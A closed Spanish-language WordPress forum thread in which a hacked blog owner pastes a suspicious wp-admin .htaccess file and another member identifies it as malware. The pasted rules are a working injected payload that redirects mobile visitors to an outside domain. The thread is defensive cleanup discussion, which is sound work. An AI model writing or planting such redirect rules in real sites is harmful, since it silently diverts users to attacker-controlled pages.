.htacces en wp-admin

Inicio Foros WordPress Seguridad .htacces en wp-admin

Este debate contiene 2 respuestas, tiene 2 mensajes y lo actualizó  Tamagochi hace 5 años, 9 meses.

  • Autor
    Publicaciones
  • #67391

    Tamagochi
    Participante

    Hola

    Pues nada, siguiendo con el blindaje de mi blog tras el hackeo recibido, he instalado el plugin WP-Security y me dice que no tengo .htaccess en mi directorio wp-admin lo curioso es que en otro sitio no me detecta este fallo por lo que me he ido a ese y he revisado el .htaccess y me sale con contenido que os pongo a continuacion:
    RewriteEngine On
    RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
    RewriteCond %{HTTP_USER_AGENT} ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$ [NC,OR]
    RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR]
    RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
    RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302]

    Ante esto y teniendo en cuenta que ni mi web es de telefonía ni la url esa que aparece es mia, me surge la duda de si es contenido malicioso. Me podeis ayudar??

    Por otro lado, que contenido debería tener este .htaccess para mi carpeta wp-admin??

    Salu2

  • #67394

    LGrusin
    Miembro

    Ninguna carpeta de WordPress necesita el archivo .htaccess a no ser el raiz si configuras el permalink. Algún plugin pueden necesitar su propio .htaccess pero eso lo crean ellos.

    Ese .htaccess lo puedes eliminar puesto que es malware. http://labs.sucuri.net/?malware&entry=2012-12-09

    Un saludo

  • #67437

    Tamagochi
    Participante

    Hola

    Gracias, lo he comprobado si, respecto a este .htaccess me lo recomienda el plugin firewall pero no te lo hace el te dice que lo pongas tu. En el blog no vi ningun ejemplo por eso preguntaba. Ninguno lo teneis en esa carpeta??

    Salu2

El foro ‘Seguridad’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest